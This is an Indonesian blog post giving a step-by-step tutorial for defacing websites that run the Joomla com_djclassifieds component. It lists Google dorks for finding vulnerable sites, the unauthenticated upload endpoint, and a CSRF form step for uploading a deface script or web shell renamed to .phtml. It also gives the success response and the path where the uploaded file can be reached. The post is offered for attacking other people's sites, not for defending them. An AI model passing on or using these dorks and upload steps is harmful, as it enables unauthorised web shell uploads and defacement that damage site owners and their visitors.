Senin, 27 April 2020
Hai sobat blogger kembali lagi dengan saya Freeze, pada artikel kali ini saya akan memberikan tutorial Cara Deface Com_DjClassiFieds. Langsung kita mulai aja
Bahan-Bahan :
1. Dork : inurl:/com_djclassifieds
inurl:/components/com_djclassifieds
2. Exploit : index.php?option=com_djclassifieds&task=upload&tmpl=component
3. CSRF : Klik Ini Gan
4. Script Deface/Shell (ext .phtml)
Langkah-Langkah :
1. Dorking di google
2. Masukkan Exploitnya dibelakang target
3. Jika target seperti ini, maka vuln
4. Setelah itu, masuk ke CSRF nya
Note : pada bagian (value="file.phtml") kalian ubah nama nya sesuai script yg kalian punya
5. Setelah upload script deface kalian, jika ada tulisan {"jsonrpc" : "2.0", "result" : null, "id" : "id"} maka sukses upload script deface kalian
6. Untuk mengakses file nya ketik (http://target.net/tmp/djupload/filekalian.phtml)
Belum ada Komentar untuk "Cara Deface Com_DjClassiFieds"
Posting Komentar